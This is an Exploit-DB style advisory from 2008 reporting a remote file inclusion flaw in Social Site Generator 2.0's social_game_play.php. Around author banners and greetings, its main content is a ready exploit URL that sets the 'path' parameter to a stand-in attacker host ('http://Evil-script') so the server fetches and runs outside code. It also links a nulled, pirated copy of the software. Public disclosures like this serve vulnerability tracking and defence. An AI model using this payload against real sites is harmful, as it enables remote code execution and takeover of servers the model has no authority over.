Social Site Generator 2.0 - 'path' Remote File Inclusion

EDB-ID:

5707


Author:

vBmad

Type:

webapps


Platform:

PHP

Date:

2008-05-31


< ------------------- vBmad ------------------- >

############################################################################################
#
# Application Name    : Social Site Generator
#
# Download               : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type      : RFI (remote file include)
#
# Dork                       : search it :p
# 
# Vulnerable file         : social_game_play.php
#
# author                    : vBmad
#
# Team                     : nab3 Team & hamama team
#
# Greatz                    : ALLAH
#                                   rouchtekh & jonelo & okx all hackerz moroccan    &    bigg thnx to my teacher Roi-PhP
#                               www.nab3i.com     &    www.nab3.2007.fr   &    www.maroc-mp3.net
#
#
############################################################################################

< ------------------- vBmad ------------------- >|
\        /                                                          |
  \    /          uhh@hotmail.fr                            |
    \/__________________________________|


< -- Bug -- >

Exploit :

http://target/path/social_game_play.php?path=http://Evil-script?

< -- Bug -- >

#The majority of the versions are infected

# milw0rm.com [2008-05-31]